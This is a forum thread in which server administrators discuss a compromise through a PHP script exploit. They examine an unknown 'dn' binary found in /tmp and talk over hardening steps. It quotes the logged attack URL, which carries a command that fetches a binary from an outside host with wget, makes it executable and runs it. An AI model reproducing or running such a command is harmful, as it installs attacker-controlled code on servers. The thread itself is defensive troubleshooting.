Hello,

this morning i have found a DN files in the TMP directory of my two server, the files is compiled and the permission was to 755 i have run also ps -aux | grep nobody and i have see 4 process with "ps a" what's type of script is this?

thx

umm i have found the same file also in /dev/shm :(

ok i have found also the script

http://sgtpeppers.net/d.txt

and the string!

http://sgtpeppers.net/d.txt?&cmd=cd%20/tmp%20;%20wget%20sgtpeppers.net/dn%20;%20chmod%20777%20dn%20;%20./dn

:angry:

Typical php script exploit.

Its good that you found the script. I guess you need to secure your /tmp partition to prevent nobody from accessing it.

Originally posted by Mike_R
Its good that you found the script. I guess you need to secure your /tmp partition to prevent nobody from accessing it.

Not a good idea, php scripts will not work.

it's is already mounted as nosuexe and nosuid i have also the wget and lynx set to 000, so how is possibol that he have upload it with wget if i have disable it?

Originally posted by dlc2000
it's is already mounted as nosuexe and nosuid i have also the wget and lynx set to 000, so how is possibol that he have upload it with wget if i have disable it?

Upload it with ftp, or curl and secure with php. The curl binary allows uploading, also there is a binary called RCP that would allow it. SCP woudl allow aswell.

yes ok but the string in the apache log report wget so he have upload it with wget but as i told it is disable :( bahhh

well, he could have tried wget, and then it didnt work and he tried somethign differet? try greping the url.

Originally posted by thelinuxguy
Upload it with ftp, or curl and secure with php. The curl binary allows uploading, also there is a binary called RCP that would allow it. SCP woudl allow aswell.

Steve, do you recommend us to block scp, curl, rcp and ftp through mod_security like wget?